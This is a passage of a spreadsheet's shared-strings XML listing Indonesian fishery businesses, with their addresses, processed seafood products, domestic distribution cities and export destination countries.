    <t>Jl. Hayam Wuruk No. 1 RT 03 RW 05, Kel. Sukodadi, Kec. Sukodadi, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Sosis Ikan, Kaki Naga) </t>
  </si>
  <si>
    <t>Kabupaten Sidoarjo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Kawasan Industri Lippo Cikarang Delta Silicon I Jl. Akasia I Kav A8 No.5A, Kel. Sukaresmi, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bandung, Kota Bekasi, Kota Surabaya, Kota Makassar</t>
  </si>
  <si>
    <t>Komp Industri Pergudangan Safe N Lock, Jl. Lingkar Timur O No.1770, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Jebung, Makerel, Marlin, Layaran, Selar, Layang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Japan, Sri Lanka, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Tikala Kumaraka Lingkungan III No.23, Kel. Tikala Kumaraka, Kec. Tikala, Kota Manado&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok F-1532, Jl. Lingkar Timur Km 5,5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Sri Lanka, Suriname, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Desa Ujir, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Bokesan, Kel. Sindumartani, Kec. Ngemplak, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Abon Lele, Abon Nila</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Semarang, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Nila Krispy</t>
  </si>
  <si>
    <t>Dusun Naukkaluku, Desa Lalatedong, Kec. Sendana, Kabupaten Majene&lt;br&gt;Sulawesi Barat</t>
  </si>
  <si>
    <t>Ikan Terbang Bakar Kering</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Terbang)</t>
  </si>
  <si>
    <t>Jl. Raya Palembang - Prabumulih Km 29, Kel. Palem Raya, Kec. Indralaya Utara, Kabupaten Ogan Ilir&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Paha Kodok Masak Beku</t>
  </si>
  <si>
    <t>Jl. Sagerat Tanjung Merah, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Malalugis, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Raya Jenu - Merak Urak No.148 C, Desa Sekardadi, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Malang, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Raya Jenu - Merak Urak No.148 C, Kel. Sekardadi, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Ebi Khinchaku, Kue Ikan, Kekian, Siomay Ikan, Otak-otak Ikan, Bakso Ikan, Sosis Ikan, Scallop Surimi, Bola Keju Ikan, Nugget Ikan)</t>
  </si>
  <si>
    <t>Kabupaten Rembang, Kabupaten Pati, Kabupaten Kudus, Kabupaten Kediri, Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Bojonegoro, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Pamekasan, Kota Malang, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>Dusun Sido Mulyo RT 005, Kel. Kota Baru, Kec. Geragai, Kabupaten Tanjung Jabung Timur&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Naget Patin)</t>
  </si>
  <si>
    <t>Kabupaten Tanjung Jabung Timur</t>
  </si>
  <si>
    <t>Kabupaten Tanjung Jabung Timur, Kota Jambi</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Singapore, United States</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Singapore, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Depok, Kota Tangerang</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, United States, Viet Nam</t>
  </si>
  <si>
    <t>Singapore, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Marlin, Meka, Layaran, Layang, Cakalang, Tenggiri, Pedang, Lemadang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Pusat, Kota Tangerang</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Kakatua, Bawal, Kakap, Kaci-kaci, Kuro, Tetet)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Japan, Philippines, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Philippines, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kabupaten Karawang, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Mujair, Patin, Nila)</t>
  </si>
  <si>
    <t>Malaysia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Jl. Raya Serang Km 12,5, Kampung Kadu RT 006 RW 001, Kel. Bunder, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Desa Pale, Kec. Tobelo Selatan, Kabupaten Halmahera Utara&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Malong, Gulama, Pisang-pisang, Anggoli, Kerapu, Layur, Beloso, Kakatua, Bawal, Kaca Piring, Perak-perak, Kakap, Baronang, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Baby Tuna, Barakuda, Tude, Tongkol, Gabus Laut, Julung-julung, Makarel, Lemadang, Selar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Titi Pahlawan No.38, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Australia, Canada, France, Italy, Korea, Democratic People's Republic of, Malaysia, Singapore, Spain, Turkey, Viet Nam</t>
  </si>
  <si>
    <t>France, Hong Kong, Italy, Malaysia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Biji Nangka, Kerapu, Layur, Sukang, Beloso, Kakatua, Bawal, Jenggot, Kaca Piring, Kakap, Baronang, Kurisi, Cunang, Barramundi)</t>
  </si>
  <si>
    <t>China, France, Italy</t>
  </si>
  <si>
    <t>Pelabuhan Perikanan Samudera Nizam Zachman Jl. Muara Baru Ujung Blok L No.3 Room 4 dan 5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kota Depok, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Colombia, Japan, Korea, Democratic People's Republic of, Malawi, Singapore, South Africa, Sri Lanka, Suriname, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Deho, Kembung, Lemadang, Meka, Gindara, Muroaji, Layaran, Layang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, South Africa, Suriname, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Katamba, Kuwe, Kerapu, Jenaha, Kakatua, Bawal, Kakap, Baronang, Kurisi, Selar Kuning, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Brigjen Katamso No.24-26, Kel. Kampung Dalem, Kec. Kediri, Kota Kediri&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.8, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Nike, Layang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Teri, Lemuru, Mata Besar, Tongkol, Terbang, Kuwe)</t>
  </si>
  <si>
    <t>Congo, Ghana, Nigeria, Thailand</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Singapore</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Gulama, Lencam, Sebelah, Senangin)</t>
  </si>
  <si>
    <t>Jl. Raya Kepadangan No.104 RT 003 RW 001, Kel. Kepadangan, Kec. Tulangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Denmark, India, Philippines, Spain, Viet Nam</t>
  </si>
  <si>
    <t>Bola Tuna Artery Beku</t>
  </si>
  <si>
    <t>Jl. Kuala Lempuing No.18, Kel. Lempuing, Kec. Ratu Agung, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Abon Tuna</t>
  </si>
  <si>
    <t>Kota Bengkulu</t>
  </si>
  <si>
    <t>Komplek UPTD PPI Ujung Baroh, Jl. TPI, Kel. Ujong Baroh, Kec. Johan Pahlawan, Kabupaten Aceh Barat&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Jl. Pulau Sumbawa II No.5A KIM II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Makarel Beku</t>
  </si>
  <si>
    <t>Jl. Kima 6 Kav F3/B1 - F3/B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Raya Deandles Km 76, Kel. Kandang Semangkon, Kec. Paciran, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Malong, Kuniran, Kerapu, Layur, Rejung, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Singapore, United States, Viet Nam</t>
  </si>
  <si>
    <t>Lingkungan III RT 013 RW 003, Kel. Madidir Unet, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Tuna Rebus Beku</t>
  </si>
  <si>
    <t>Canada, China, Korea, Republic of, Norway, Singapore, Thailand, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Rebus Beku</t>
  </si>
  <si>
    <t>Ikan Demersal Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Raya Pengambengan, Kel. Tegal Badeng Barat, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Surabaya, Kabupaten Jembrana, Kota Denpasar, Kabupaten Jayapura</t>
  </si>
  <si>
    <t>Sarden Kaleng, Makarel Kaleng</t>
  </si>
  <si>
    <t>Ghana, Japan, Korea, Democratic People's Republic of, Nigeria</t>
  </si>
  <si>
    <t>Komplek PPN Ternate, Jl. Pasar Inpres Bastiong No.97, Kel. Bastiong Talangame, Kec. Ternate Selatan, Kota Ternate&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Udang Pasteurisasi Pouch</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Perintis Kemerdekaan Ruko 237 No.17-18, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar, Kota Manado, Kota Makassar</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Saudi Arabia, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Raya Manado Tomohon 79, Kel. Pineleng II, Kec. Pineleng, Kabupaten Minahasa&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Manado</t>
  </si>
  <si>
    <t>Jl. Teterusan No.55, Kel. Mapanget, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok S No.14, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Sebelah, Kuwe, Kerapu, Layur, Bawal, Samge, Kakap, Ayam-ayam, Barramundi)</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Malaysia, Singapore, South Africa, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Gabus Laut, Senangin, Lemadang, Gindara, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Jl. Pulau Buton KIM II Mabar, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Canada, China, Korea, Democratic People's Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Gulama, Senangin, Kerapu, Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Jl. Sanrangan No.14, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Sebelah, Kerapu, Layur, Jenaha, Kaneke, Kakatua, Kakap, Guntur, Barramundi)</t>
  </si>
  <si>
    <t>Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Batam, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Singapore, Thailand, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Utara, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Australia, Brunei Darussalam, China, Hong Kong, Japan, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bream, Lencam, Manyung, Kuwe, Anggoli, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bream, Lencam, Manyung, Kuwe, Anggoli, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Cakalang, Tenggiri, Pedang, Cobia)</t>
  </si>
  <si>
    <t>Jl. Suwandi Blok C No.52 RT 23, Kel. Gunung Kelua, Kec. Samarinda Ulu, Kota Samarinda&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Jl. Garuda Lk IV Pulau Buaya, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Layang)</t>
  </si>
  <si>
    <t>Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Ikan Pindang Kering</t>
  </si>
  <si>
    <t>Brunei Darussalam, China, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Daging Lobster Beku</t>
  </si>
  <si>
    <t>Brunei Darussalam, China, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Dusun II, Kel. Air Joman Baru, Kec. Air Joman, Kabupaten Asahan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Tenggiri)</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu Bintik, Kerapu, Kakap Merah, Merah, Kakap)</t>
  </si>
  <si>
    <t>Jl. Garuda, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Sarden, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jambi, Kota Palembang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal Hitam, Malong, Samge)</t>
  </si>
  <si>
    <t>Kota Cirebon</t>
  </si>
  <si>
    <t>Pergudangan Biz Point Blok Hokkaido No.60, Jl. Raya Pemda Tigaraksa, Kel. Sukamulya, Kec. Cikupa, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Minyak Hati Cod</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Depok</t>
  </si>
  <si>
    <t>Minyak Salmon</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Depok</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Depok, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Squalene</t>
  </si>
  <si>
    <t>Jl. Lingkar Lingkungan XI Komplek Pelabuhan Perikanan Samudera Belawan Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium Jl. Millenium 22 Blok R-5 No.3 Room C3, Kel. Kadu Agung, Kec. Tiga Raksa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Yogyakarta, Kota Tangerang, Kota Denpasar, Kota Balikpapan, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto Ds. Karangbong, Kel. Karangbong, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Singapore</t>
  </si>
  <si>
    <t>Jl. Gabion Perikanan Nusantara No.4, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Tuban Tambakboyo, Kel. Sobontoro, Kec. Tambakboyo, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Kel. Manembo-nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Bandung</t>
  </si>
  <si>
    <t>Perum Bukit Pinang Bahari Blok AA5 No.1, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Otak-Otak Bandeng</t>
  </si>
  <si>
    <t>Jl. Beringin Indah Timur RT 001 RW 024, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Anggoli, Kerapu, Bawal, Kapas-kapas, Kakap, Kaci-kaci, Kurisi, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Raya Tropodo No.126, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Lingkar Utara Mangunharjo , Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Canada, United Kingdom, United States</t>
  </si>
  <si>
    <t>Lingkungan I, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Japan, Viet Nam</t>
  </si>
  <si>
    <t>Kp Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Tenggiri, Selayar)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Anggoli, Kerapu, Bawal, Kapas-kapas, Kakap, Kurisi, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Marlin, Pedang)</t>
  </si>
  <si>
    <t>Jl. Cumi-cumi No.10, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Senangin, Kerapu, Layur, Bawal, Kakap, Ayam-ayam, Kuro, Tonang)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Lamongan, Kota Pasuruan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Julung-julung, Kembung, Talang-talang, Selar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Probolinggo</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Muara Angke No.25, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Japuh, Selar, Layang, Gabus, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Tegal</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuwe, Layur, Bawal, Talang-talang, Kakap)</t>
  </si>
  <si>
    <t>Jl. Margomulyo Indah 1 F No.23, Kel. Balongsari, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kuwe, Janahan, Kerapu, Layur, Sukang, Malabar, Kakatua, Kakap, Kuro, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Sabutung Baru No.14, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Malaysia, Saudi Arabia, Singapore, United Arab Emirates</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Sebelah, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Latukoko Oliana RT 003 RW 005, Kel. Tablolong, Kec. Kupang Barat, Kabupaten Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Alkali Treated Chips</t>
  </si>
  <si>
    <t>Argentina, China, Philippines</t>
  </si>
  <si>
    <t>Desa Pohea RT 005 RW 002, Kec. Sanana Utara, Kabupaten Kepulauan Sula&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Malalugis, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah Raya No.43A, Kel. Tallo, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Katamba, Senangin, Kerapu, Kakaktua)</t>
  </si>
  <si>
    <t>Kampung Bugis, Kel. TPI Kota, Kec. TPI Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Sarden, Selar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Manyung, Kerapu, Bawal, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Kota Semarang, Kota Makassar</t>
  </si>
  <si>
    <t>Belut Segar</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Gulama, Manyung, Kerapu, Layur, Bawal, Kakap, Baronang, Kurisi, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Segar (Lele, Gurami, Empurau, Betutu, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Keong Segar</t>
  </si>
  <si>
    <t>Jl. Raya Situbondo - Banyuwangi KM.17, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Marlin, Layaran, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Gulama, Lencam, Kerapu, Kakap)</t>
  </si>
  <si>
    <t>China, Hong Kong, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Perancis No.2 Pergudangan Pantai Indah Dadap Blok BA No.21-22, Kel. Dadap, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
